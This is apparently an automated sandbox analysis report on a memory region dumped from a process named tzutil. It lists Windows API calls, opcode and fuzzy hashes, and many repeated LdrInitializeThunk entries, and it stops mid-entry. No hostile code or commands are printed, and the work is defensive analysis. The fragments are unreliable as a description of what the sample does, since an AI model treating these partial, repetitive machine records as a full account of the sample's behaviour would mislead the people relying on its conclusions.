                                                              Signature Coverage:2.3%
                                                              Total number of Nodes:440
                                                              Total number of Limit Nodes:70
[execution_graph: rendered call graph over the dumped code region 0x3204230-0x322c9c0 plus the 0x39f2ad0-0x39f4650 stubs; raw node/edge list omitted. API nodes reached in the graph: CreateThread, CreateProcessInternalW, NtAllocateVirtualMemory, NtCreateFile, NtReadFile, NtDeleteFile, NtClose, RtlAllocateHeap, RtlFreeHeap, LdrLoadDll, LdrInitializeThunk, PostThreadMessageW, SetErrorMode, GetFileAttributesW, FindFirstFileW, FindNextFileW, FindClose, CoInitialize, CoUninitialize, Sleep.]

                                                              Control-flow Graph

[control_flow_graph: rendered graph for the function spanning 3209f80-320a81a (basic blocks numbered 26 to 120, coloured Executed / Not Executed in the interactive report; block 78 at 320a654 calls 322b450); raw node/edge list omitted.]
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                              • API String ID: 0-3230942322
                                                              • Opcode ID: d2fceb3984bf6131fc5bbc0a0e3e4c86090a5b8b55a6a7e6dd9dc9d279c4d58f
                                                              • Instruction ID: e5587581c8f7fd95d0db1ba167feb44b3a91e03c8f9a1a5c4c71020bc3cf8e6c
                                                              • Opcode Fuzzy Hash: d2fceb3984bf6131fc5bbc0a0e3e4c86090a5b8b55a6a7e6dd9dc9d279c4d58f
                                                              • Instruction Fuzzy Hash: FE32ACB0E25269CFEB24CF54C894BDDBBB1BB45308F9081D9D44A6B281C7B95AC9CF41
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0321CAB1
                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0321CAEE
                                                              • FindClose.KERNELBASE(?), ref: 0321CAF9
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 3541575487-0
                                                              • Opcode ID: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                              • Instruction ID: 4b2cba86e737c05c147f892595ee2ad335bc5b702d026bf7618c7f35bfcb0b1c
                                                              • Opcode Fuzzy Hash: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                              • Instruction Fuzzy Hash: 5F31D4BA910319BBDB21DF60CC84FEF77BC9F54705F140448B908AA180DAF0AAD4CBA0
                                                              APIs
                                                              • NtCreateFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?,?,?), ref: 0322957B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                              • Instruction ID: 7d0be3fb2b0ce5ded181d6e511e34165e8e7427962fac13568d634b537547f6e
                                                              • Opcode Fuzzy Hash: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                              • Instruction Fuzzy Hash: 8831C5B5A11248AFCB54DF99D880EEEB7F9EF88304F108119F908A7340D770A951CBA5
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?), ref: 032296D6
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                              • Instruction ID: 75688ea78f04a4bcfe59889a516a329ca6ca644c62aedbe6da48438f22ca5c53
                                                              • Opcode Fuzzy Hash: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                              • Instruction Fuzzy Hash: C031E7B5A10208AFCB14DF99DC40EEFB7F9EF88704F108209F958AB340D670A951CBA5
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(032121AE,?,5BC7A5B0,00000000,00000004,00003000,?,?,?,?,?,032282FF,032121AE), ref: 032299A8
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                              • Instruction ID: 8f6d34db5194f2f0b675a26b1f6fb105199e29ffe44af04d825a68e147070042
                                                              • Opcode Fuzzy Hash: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                              • Instruction Fuzzy Hash: 3D2106B5A10349ABDB10DF99DC81EEFB7B9EF89700F108109F948AB240D774A9518BA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFile
                                                              • String ID:
                                                              • API String ID: 4033686569-0
                                                              • Opcode ID: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                              • Instruction ID: e5106a119efd5cd416e5f5116e668c7f3933ad24ea33e6ea4250a55df83a4d9c
                                                              • Opcode Fuzzy Hash: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                              • Instruction Fuzzy Hash: 5F11A0756117187AD720EA55DC41FABB7ACDF85704F104109F94C6B280DBB0B954CBA6
                                                              APIs
                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 032297B1
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction ID: 4721a0e49781a547d7c2a6d3393e6df26b9eb71fa1d0c71780376ed4688d079d
                                                              • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction Fuzzy Hash: C4E08C3A211714BBD220FA5ADC00F9BBB6CEFC6710F408115FA48AB281C6B1B9148BF0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7c3adbc09f1be0b34b4a5c106fdaa40909ad4bc353a383d1918ea387949acb39
                                                              • Instruction ID: e52265c94697f9e938ce5aba5c349aaffabfa8bab6c294d99be03f53aa08316f
                                                              • Opcode Fuzzy Hash: 7c3adbc09f1be0b34b4a5c106fdaa40909ad4bc353a383d1918ea387949acb39
                                                              • Instruction Fuzzy Hash: 65900231605C04529140B1585884546400997E0301B56C012E0425598C8B188A565375
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 75d82233894b1d3a2c62cecc26726235a05ca91a2bb3a1f4f321a56fe25d57ad
                                                              • Instruction ID: 525c9fe296e8f88a2ceec949d04678834f7456ee32894c3d2725911a8c90baba
                                                              • Opcode Fuzzy Hash: 75d82233894b1d3a2c62cecc26726235a05ca91a2bb3a1f4f321a56fe25d57ad
                                                              • Instruction Fuzzy Hash: 8B900261601904824140B1585804406600997E1301396C116A05555A4C871C8955927D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5b38a6c2fe608ce3ffd6b22ce5266f121a8d38badfcb6b688470d5c23e963426
                                                              • Instruction ID: b918db0a76e6fce5cbc93619cd9d9e90d7a0883a23c552d9856ed1388f2031e7
                                                              • Opcode Fuzzy Hash: 5b38a6c2fe608ce3ffd6b22ce5266f121a8d38badfcb6b688470d5c23e963426
                                                              • Instruction Fuzzy Hash: 2990023160580C42D150B1585414746000987D0301F56C012A0025698D87598B5576B5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 0abdd6d8841d51e7757498bf3efc129c30d643d5144ec38a04dc4c30d6022e6b
                                                              • Instruction ID: c75f349a9db8446569830cb8cbd16b489f5ddd5a7f153aafa1936abfb76cc2d0
                                                              • Opcode Fuzzy Hash: 0abdd6d8841d51e7757498bf3efc129c30d643d5144ec38a04dc4c30d6022e6b
                                                              • Instruction Fuzzy Hash: 9390023120180C42D180B158540464A000987D1301F96C016A0026698DCB198B5977B5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 345b1dfe57aeef9b79ff9bf7b47230ecb307b9f9671805da4d298c076a1c5782
                                                              • Instruction ID: ef8e57c4cc476dc49975912577fb1ac1f657dedf7ea623733c536f381276f169
                                                              • Opcode Fuzzy Hash: 345b1dfe57aeef9b79ff9bf7b47230ecb307b9f9671805da4d298c076a1c5782
                                                              • Instruction Fuzzy Hash: 5790023120584C82D140B1585404A46001987D0305F56C012A00656D8D97298E55B675
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2f18d895c7c9e35b3c2f5a2b4c2534484fe574b6ab1b6052e061793e77808a8e
                                                              • Instruction ID: b1411211dfd18bf1de879d0401761d31fc11c052e57303fb4b9d5274366121a0
                                                              • Opcode Fuzzy Hash: 2f18d895c7c9e35b3c2f5a2b4c2534484fe574b6ab1b6052e061793e77808a8e
                                                              • Instruction Fuzzy Hash: 60900261202804434105B1585414616400E87E0301B56C022E10155D4DC62989916139
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9cfc2b650028779b2ba8a5e7590f70ed2a1b28fb555fc0eb1951ccf4313fe509
                                                              • Instruction ID: 08b368d6d05128c1d4d8facf88d395e30610ebeb493565687ed7902100c991f5
                                                              • Opcode Fuzzy Hash: 9cfc2b650028779b2ba8a5e7590f70ed2a1b28fb555fc0eb1951ccf4313fe509
                                                              • Instruction Fuzzy Hash: 9B900435311C04430105F55C1704507004FC7D5351357C033F10175D4CD735CD715135
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a6dbecc98ccb5c6dea33a1e53ebe4e421ac7c1e057ecefd7652d2ae9110be5c9
                                                              • Instruction ID: 9db0e2cd9898a26edf6c5547cc9b5431b91e7da04ceee649cf7f09018c8d522f
                                                              • Opcode Fuzzy Hash: a6dbecc98ccb5c6dea33a1e53ebe4e421ac7c1e057ecefd7652d2ae9110be5c9
                                                              • Instruction Fuzzy Hash: 63900225221804420145F558160450B044997D6351396C016F14175D4CC72589655335
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2e74e423d2efd63448ea12bb32adf0384efbbd8ccaa5303b03fb2c840fc72ea7
                                                              • Instruction ID: 6a4cac155868e1df695b83af79326e6da278521be2449868215b1bf5ede15415
                                                              • Opcode Fuzzy Hash: 2e74e423d2efd63448ea12bb32adf0384efbbd8ccaa5303b03fb2c840fc72ea7
                                                              • Instruction Fuzzy Hash: DF900221601804824140B16898449064009ABE1311756C122A0999594D865D89655679
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 636c742156d339057245393af77ad67f56d274f7ee5894c102eaaa0b212a3832
                                                              • Instruction ID: 10ea88beb5035c812e898236034cda243cb40d4615dfc9181a98f0851ce44959
                                                              • Opcode Fuzzy Hash: 636c742156d339057245393af77ad67f56d274f7ee5894c102eaaa0b212a3832
                                                              • Instruction Fuzzy Hash: 98900221211C0482D200B5685C14B07000987D0303F56C116A0155598CCA1989615535
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5e42d4053721cced3c33be288a2f33be854a4fea013059c27dd889e960620fca
                                                              • Instruction ID: 0fa11d143b7b6016feaa2490db808422d2a9a2bb610510c8fb5334c22c1ae970
                                                              • Opcode Fuzzy Hash: 5e42d4053721cced3c33be288a2f33be854a4fea013059c27dd889e960620fca
                                                              • Instruction Fuzzy Hash: B990026134180882D100B1585414B060009C7E1301F56C016E1065598D871DCD52613A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b9a932b12370ef83b976116b010c6e609b081c10b78b893141f40c0197dcf8d4
                                                              • Instruction ID: bb4bb734811bc789774074fab9e7c7baaccd7269fe60c3f0abc12838b995e926
                                                              • Opcode Fuzzy Hash: b9a932b12370ef83b976116b010c6e609b081c10b78b893141f40c0197dcf8d4
                                                              • Instruction Fuzzy Hash: F690022160180942D101B1585404616000E87D0341F96C023A1025599ECB298A92A135
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 77f2176f1b2258b8fe7579b4446b6e91058a78e144306031a097421006ae70c8
                                                              • Instruction ID: be94351e97ecb95139f5dfbcdbb15cb10e05dc254fe90dc28aabadc9bd53753d
                                                              • Opcode Fuzzy Hash: 77f2176f1b2258b8fe7579b4446b6e91058a78e144306031a097421006ae70c8
                                                              • Instruction Fuzzy Hash: 99900261201C0843D140B5585804607000987D0302F56C012A2065599E8B2D8D516139
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 73fe57f81772754be70e53f8b5a353b23efef592857b760508805406e8e69836
                                                              • Instruction ID: 6061ff2149cdc1caf7753a447ef72523d81ac32d770925ba26dd83adc474c142
                                                              • Opcode Fuzzy Hash: 73fe57f81772754be70e53f8b5a353b23efef592857b760508805406e8e69836
                                                              • Instruction Fuzzy Hash: E6900221242845925545F1585404507400A97E0341796C013A1415994C862A9956D635
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6ee543b7e7f29b4dfc3b36317524b3074f22beb1f8ba713e26a561731aeb0dad
                                                              • Instruction ID: abc4fd61adb98ff21e1449b350e582ba28c3febf3743d3cb70329a2805583b6f
                                                              • Opcode Fuzzy Hash: 6ee543b7e7f29b4dfc3b36317524b3074f22beb1f8ba713e26a561731aeb0dad
                                                              • Instruction Fuzzy Hash: 6790023120180853D111B1585504707000D87D0341F96C413A042559CD975A8A52A135
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: fa2fcb4ac5704086847a0aba71809defa68a3077e1e1f2ed02d15c5d9056a453
                                                              • Instruction ID: 241ab67a74e434f0d47a4146b769ebcb8ca4bbc84510ab9b288e8182af3361eb
                                                              • Opcode Fuzzy Hash: fa2fcb4ac5704086847a0aba71809defa68a3077e1e1f2ed02d15c5d9056a453
                                                              • Instruction Fuzzy Hash: EB90022921380442D180B158640860A000987D1302F96D416A001659CCCA1989695335
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7918fa952d9b73be268cae24ba2b852691eca8fde16bcdd50e1d48222e0bf53e
                                                              • Instruction ID: 7ca026e5901e31ee785016af696316d4d52b37fc378b1e591c1fa56edd54894b
                                                              • Opcode Fuzzy Hash: 7918fa952d9b73be268cae24ba2b852691eca8fde16bcdd50e1d48222e0bf53e
                                                              • Instruction Fuzzy Hash: FE90022130180443D140B15864186064009D7E1301F56D012E0415598CDA1989565236
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 644ec1d2c46886536939720e056a8691bcb4e9a149a050424028668c306395c8
                                                              • Instruction ID: 535d917ef126b9399704e1713ff6568e379fd40452c3fbdd5166789326882350
                                                              • Opcode Fuzzy Hash: 644ec1d2c46886536939720e056a8691bcb4e9a149a050424028668c306395c8
                                                              • Instruction Fuzzy Hash: 5090023120180842D100B5986408646000987E0301F56D012A5025599EC76989916135
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 892999265728ba5ef09b23913f6eefb4d228172724636397d969ca05a149a1ed
                                                              • Instruction ID: 602e9f2fa079dc22f489373dcbe45e3000f6120967fc204f5bc721bd5988475e
